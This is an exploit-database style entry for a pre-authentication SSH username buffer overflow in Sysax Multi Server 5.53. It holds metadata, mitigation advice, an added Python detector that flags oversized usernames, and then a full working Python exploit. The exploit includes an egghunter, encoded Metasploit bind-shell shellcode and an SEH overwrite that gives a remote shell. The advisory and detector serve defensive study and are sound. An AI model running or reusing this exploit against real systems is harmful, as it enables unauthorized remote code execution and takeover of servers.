Vendor: Sysax Multi Server
By: Craig Freyman
CVSS: 9 (CRITICAL)
Description: The exploit allows remote attackers to execute arbitrary code via a long SSH username, which triggers a buffer overflow in the username field of the SSH handshake process.
CWE: 119
Product Name: Sysax Multi Server
Affected Version From: <= 5.53
Affected Version To: 5.53
Patch Exists: YES
Related CVE: CVE-2012-1000
CPE: a:sysax:sysax_multi_server:5.53
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 32-bit, Windows 2003 Server SP2 (No DEP)

Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)

Mitigation:

Upgrade to Sysax version 5.55 or later.
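As an added defensive example (not code from the Exploit-DB entry or from Sysax), the Python 3 script below parses the user name out of an SSH_MSG_USERAUTH_REQUEST payload (RFC 4252, message type 50) and flags names longer than a configurable limit, which is the condition this entry describes. The 256-byte limit, the function names and the sample packets are constructed for illustration. Because user authentication happens after key exchange, the payload is encrypted on the wire, so a check like this belongs where the decrypted message is available (inside the server, an SSH proxy or a honeypot) rather than in a passive network sensor.

```python
"""Flag oversized user names in SSH_MSG_USERAUTH_REQUEST payloads.

Added defensive example; not part of the Exploit-DB entry. The packet
layout follows RFC 4252 section 5: one message-type byte followed by the
SSH "string" fields user name, service name and method name, each encoded
as a big-endian uint32 length and the raw bytes.
"""
import struct

SSH_MSG_USERAUTH_REQUEST = 50
MAX_USERNAME_LEN = 256  # assumed policy limit; the public exploit sent a ~9 KB user name


def ssh_string(data):
    """Encode bytes as an SSH "string" (uint32 length + bytes)."""
    return struct.pack(">I", len(data)) + data


def build_userauth_request(username, service=b"ssh-connection", method=b"none"):
    """Construct a decrypted userauth request payload (used only for the samples)."""
    return (bytes([SSH_MSG_USERAUTH_REQUEST])
            + ssh_string(username) + ssh_string(service) + ssh_string(method))


def read_ssh_string(buf, offset):
    """Decode one SSH string at offset; raise ValueError on a truncated or lying length."""
    if offset + 4 > len(buf):
        raise ValueError("truncated length field at offset %d" % offset)
    (n,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    if offset + n > len(buf):
        raise ValueError("string length %d exceeds packet" % n)
    return buf[offset:offset + n], offset + n


def parse_userauth_request(payload):
    """Return the three string fields, or None if this is not a userauth request."""
    if not payload or payload[0] != SSH_MSG_USERAUTH_REQUEST:
        return None
    user, off = read_ssh_string(payload, 1)
    service, off = read_ssh_string(payload, off)
    method, off = read_ssh_string(payload, off)
    return {"user": user, "service": service, "method": method}


def check_userauth_request(payload, limit=MAX_USERNAME_LEN):
    """Classify a payload as 'ok', 'alert', 'malformed' or 'ignore', with a detail string."""
    try:
        req = parse_userauth_request(payload)
    except ValueError as exc:
        # A length field that does not fit the packet is itself worth logging.
        return "malformed", str(exc)
    if req is None:
        return "ignore", "not a userauth request"
    n = len(req["user"])
    if n > limit:
        return "alert", "username length %d exceeds limit %d" % (n, limit)
    return "ok", "username length %d" % n


# Constructed sample payloads: a normal login, an oversized user name of the
# size used by the public exploit, and a packet cut off inside the user name.
SAMPLES = {
    "benign": build_userauth_request(b"alice"),
    "oversized": build_userauth_request(b"A" * 9204),
    "truncated": build_userauth_request(b"bob")[:6],
}


def scan_samples(samples=SAMPLES, limit=MAX_USERNAME_LEN):
    """Run the check over a dict of payloads and return name -> verdict."""
    return {name: check_userauth_request(p, limit)[0] for name, p in samples.items()}


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        verdict, detail = check_userauth_request(payload)
        print("%-10s %-9s %s" % (name, verdict, detail))
```

The length check is deliberately applied before any of the string fields is used, so a hostile length field cannot cause an out-of-range read in the detector itself; a server-side equivalent would reject the request at the same point instead of copying the user name into a fixed buffer.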

Exploit-DB raw data:

#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
#Author: Craig Freyman (@cd1zz)
#OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP)
#Software Versions Tested: 5.53, 5.52, 5.50
#Date Discovered: February 22, 2012
#Vendor Contacted: February 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Sysax 5.55
#Detailed Exploit Description: http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
##########################################################################################################
import paramiko,os,sys
if len(sys.argv) != 3:
    print "[+] Usage: ./filename <Target IP> <Port>"
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x44\x4e\x57\x50\x8b\xfa\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
# msfpayload  windows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X
shell = ("DNWPDNWP"
"\x89\xe0\xda\xdf\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" 
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" 
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" 
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" 
"\x42\x75\x4a\x49\x69\x6c\x68\x68\x6d\x59\x77\x70\x57\x70" 
"\x57\x70\x33\x50\x4f\x79\x39\x75\x70\x31\x7a\x72\x62\x44" 
"\x4c\x4b\x52\x72\x70\x30\x6e\x6b\x32\x72\x44\x4c\x4c\x4b" 
"\x36\x32\x74\x54\x6e\x6b\x71\x62\x34\x68\x64\x4f\x78\x37" 
"\x42\x6a\x76\x46\x54\x71\x39\x6f\x35\x61\x49\x50\x4e\x4c" 
"\x77\x4c\x61\x71\x31\x6c\x66\x62\x64\x6c\x75\x70\x39\x51" 
"\x58\x4f\x34\x4d\x66\x61\x4f\x37\x6b\x52\x6c\x30\x73\x62" 
"\x30\x57\x4c\x4b\x36\x32\x64\x50\x4c\x4b\x63\x72\x77\x4c" 
"\x57\x71\x7a\x70\x6e\x6b\x61\x50\x72\x58\x6f\x75\x79\x50" 
"\x61\x64\x50\x4a\x63\x31\x48\x50\x30\x50\x4c\x4b\x53\x78" 
"\x56\x78\x6e\x6b\x50\x58\x51\x30\x35\x51\x59\x43\x69\x73" 
"\x57\x4c\x73\x79\x4c\x4b\x47\x44\x6e\x6b\x47\x71\x79\x46" 
"\x44\x71\x4b\x4f\x35\x61\x79\x50\x6c\x6c\x39\x51\x5a\x6f" 
"\x76\x6d\x47\x71\x78\x47\x75\x68\x6b\x50\x33\x45\x39\x64" 
"\x64\x43\x73\x4d\x4c\x38\x37\x4b\x31\x6d\x45\x74\x64\x35" 
"\x39\x72\x32\x78\x4c\x4b\x30\x58\x45\x74\x47\x71\x48\x53" 
"\x50\x66\x4c\x4b\x36\x6c\x42\x6b\x4e\x6b\x56\x38\x75\x4c" 
"\x47\x71\x39\x43\x4e\x6b\x56\x64\x4e\x6b\x33\x31\x68\x50" 
"\x6b\x39\x70\x44\x76\x44\x77\x54\x43\x6b\x71\x4b\x35\x31" 
"\x36\x39\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x70\x58\x31\x4f" 
"\x42\x7a\x4c\x4b\x55\x42\x6a\x4b\x4d\x56\x63\x6d\x70\x68" 
"\x50\x33\x36\x52\x45\x50\x67\x70\x70\x68\x31\x67\x31\x63" 
"\x45\x62\x71\x4f\x31\x44\x61\x78\x52\x6c\x62\x57\x51\x36" 
"\x53\x37\x59\x6f\x4b\x65\x6f\x48\x6e\x70\x56\x61\x67\x70" 
"\x77\x70\x76\x49\x68\x44\x43\x64\x50\x50\x73\x58\x45\x79" 
"\x6b\x30\x32\x4b\x65\x50\x49\x6f\x49\x45\x62\x70\x72\x70" 
"\x76\x30\x70\x50\x53\x70\x66\x30\x67\x30\x46\x30\x45\x38" 
"\x48\x6a\x36\x6f\x39\x4f\x59\x70\x39\x6f\x78\x55\x4e\x69" 
"\x49\x57\x36\x51\x6b\x6b\x52\x73\x50\x68\x56\x62\x77\x70" 
"\x66\x71\x31\x4c\x4f\x79\x6b\x56\x51\x7a\x36\x70\x72\x76" 
"\x32\x77\x65\x38\x4b\x72\x6b\x6b\x64\x77\x71\x77\x4b\x4f" 
"\x4e\x35\x50\x53\x56\x37\x73\x58\x6c\x77\x38\x69\x37\x48" 
"\x69\x6f\x39\x6f\x78\x55\x63\x63\x30\x53\x31\x47\x62\x48" 
"\x30\x74\x78\x6c\x57\x4b\x79\x71\x6b\x4f\x79\x45\x76\x37" 
"\x4c\x49\x6f\x37\x55\x38\x73\x45\x72\x4e\x50\x4d\x43\x51" 
"\x39\x6f\x59\x45\x73\x58\x42\x43\x50\x6d\x43\x54\x75\x50" 
"\x4d\x59\x59\x73\x70\x57\x30\x57\x73\x67\x36\x51\x38\x76" 
"\x51\x7a\x57\x62\x42\x79\x36\x36\x5a\x42\x6b\x4d\x31\x76" 
"\x49\x57\x61\x54\x47\x54\x37\x4c\x67\x71\x53\x31\x4c\x4d" 
"\x67\x34\x77\x54\x74\x50\x7a\x66\x37\x70\x51\x54\x52\x74" 
"\x52\x70\x71\x46\x70\x56\x43\x66\x32\x66\x50\x56\x42\x6e" 
"\x50\x56\x46\x36\x61\x43\x43\x66\x53\x58\x73\x49\x58\x4c" 
"\x37\x4f\x4d\x56\x4b\x4f\x78\x55\x6f\x79\x69\x70\x30\x4e" 
"\x50\x56\x51\x56\x39\x6f\x76\x50\x61\x78\x63\x38\x4e\x67" 
"\x67\x6d\x71\x70\x59\x6f\x49\x45\x6d\x6b\x68\x70\x4f\x45" 
"\x4e\x42\x62\x76\x72\x48\x4c\x66\x4e\x75\x6d\x6d\x6d\x4d" 
"\x6b\x4f\x6a\x75\x37\x4c\x63\x36\x63\x4c\x45\x5a\x6f\x70" 
"\x39\x6b\x39\x70\x52\x55\x37\x75\x6d\x6b\x63\x77\x75\x43" 
"\x74\x32\x72\x4f\x51\x7a\x77\x70\x50\x53\x69\x6f\x38\x55" 
"\x41\x41")
padding1 = "\x90" * 50
padding2 = "\x90" * 50
nseh = "\x90\x90\xeb\x80"      # next SEH: short backward jump into the NOP padding
seh =  "\x69\x26\x40\x00"      # 00402669 PPR sysaxservd.exe
junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell))   # total username length is 9204 bytes
buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh
print "============================================================================"
print "                 Sysax <= 5.53 SSH Username BoF Pre Auth RCE                "
print "                                  by cd1zz                                  "
print "                               www.pwnag3.com                               "
print "============================================================================"
try:
    transport = paramiko.Transport((host, port))
except:
    print "[X] Unable to connect to " + host + " on port " + str(port)
    sys.exit(1)
print "[+] Launching exploit against " + host + " on port " + str(port)
transport.connect(username = buff, password = "pwnag3")
transport.close()
print "[+] Done!"